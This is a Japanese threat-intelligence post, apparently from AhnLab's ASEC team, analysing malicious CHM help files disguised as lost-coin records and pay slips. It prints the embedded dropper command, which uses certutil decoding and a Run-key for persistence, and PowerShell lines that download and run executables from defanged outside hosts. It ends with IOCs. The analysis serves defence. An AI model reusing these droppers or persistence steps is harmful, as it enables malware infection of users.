ASEC 分析チームは、Windows ヘルプファイル(*.chm)形式のマルウェアの拡散が続いていることを確認した。最近確認された chm ファイルは、<Windows ヘルプファイル(*.chm)によって拡散している APT 攻撃>で紹介したファイルと同じタイプであり、追加のマルウェアダウンロードを目的としている。
このタイプの chm ファイルは主に圧縮ファイル形式で配布されるものと推定される。確認された圧縮ファイル名と内部の chm ファイル名は以下の通りである。
圧縮ファイル名 | 内部の chm ファイル名 |
---|---|
コイン紛失資料.zip | lost.chm |
資料.zip | 基本.chm |
給与明細書.rar | salary.chm |
コイン紛失資料.zip ファイルには、以下のように追加の圧縮ファイルと Word ドキュメントが含まれている。

Word ドキュメントの場合は不正な機能を持たない正常なファイルであり、以下の図のようにコイン紛失に関する内容が記載されている。

紛失したコインを探す.rar には lost.chm が含まれており、このファイルを開くとコイン関連の内容を含んだヘルプウィンドウを生成し、不正な行為を実行する。


lost.chm ファイルの内部には以前の記事と同じように html ファイル内に特定のコマンドが存在する。したがって、chm ファイルを開くと cmd コマンドが実行され %USERPROFILE%\Links\ フォルダーに Document.dat ファイルと Document.jse ファイルが生成される。従来とは異なり Document.vbs ではなく Document.jse が生成されるという違いが存在する。
<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=',cmd, /c echo I0B+XnZBQUFBQT09LW1EfmsnCStoLGIxT2s3K3ByKExuXkRgSnFqbU1rd0QganR/Vl5KYmlAI0AmN2wuUDF4SjE6W35KbVAyR1MrLi80bl5WfmJoTVBPS0VEV1B1WWh3dS13XmtEL2sgK1grUDRPT3drKUp6V1dhcn80bk5jXldzeltDRGw0Q2R/els0YzI0d19EWGErJzhQTH4vRGwuWSxdT2hhXS0nXi9NLy9jbmErcmlAI0AmZFIuOwlgXn5aUzBtVmRuKmkyRDRBQUE9PV4jfkAA > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.jse" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.jse" /f'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>
Document.dat に存在するデータは base64 でデコードして Document.jse として保存する。デコードされた jse データは以下のように PowerShell を利用し、特定 url からさらなるファイルをダウンロードして実行する。
var s=new ActiveXObject("WScript.Shell");
var c="cmd /c powershell iwr -outf %tmp%\\csrss.exe hxxps://foxiebed[.]com/database/db.php?type=1 & start %tmp%\\csrss.exe";
s.run(c,0,false);
その後、HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run に %USERPROFILE%\Links\Document.jse を追加して jse ファイルが持続的に実行されるようにする。
追加で確認された chm ファイルは以下の通りである。
- 給与明細書.rar – salary.chm

(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\sihost.exe hxxps://cerebrovascular[.]net/resource/post & start %tmp%\\sihost.exe mLzio512pQo”,0,false) |
- 資料.zip – 基本.chm
当該ファイルの場合、上記で説明したコイン紛失資料.zip と同じく、正常な pdf ファイルが共に圧縮されている。


(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\lsass.exe hxxps://trueliebe[.]com/kettle/pot & start %tmp%\\lsass.exe Dmzei125oAl”,0,false) |
現在はダウンロード URL に接続できないため、追加のファイルは確認することができないが、攻撃者により様々な不正なファイルがアップロードされる恐れがあるため、ユーザーの注意が必要である。
現在 V3 では、これらのマルウェアを以下のように検知している。
[ファイル検知]
Trojan/CHM.Agent
[IOC]
aac428717f4b5ea1bfac9ae0998e661c
7467a360837a85ace6e14acc879e00e5
13446d8496858c2eac78e5e985af605b
hxxps://foxiebed[.]com/database/db.php?type=1
hxxps://cerebrovascular[.]net/resource/post
hxxps://trueliebe[.]com/kettle/pot
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] コイン紛失、給与明細書に偽装した不正なヘルプファイル (*.chm) – 2022.05.16 […]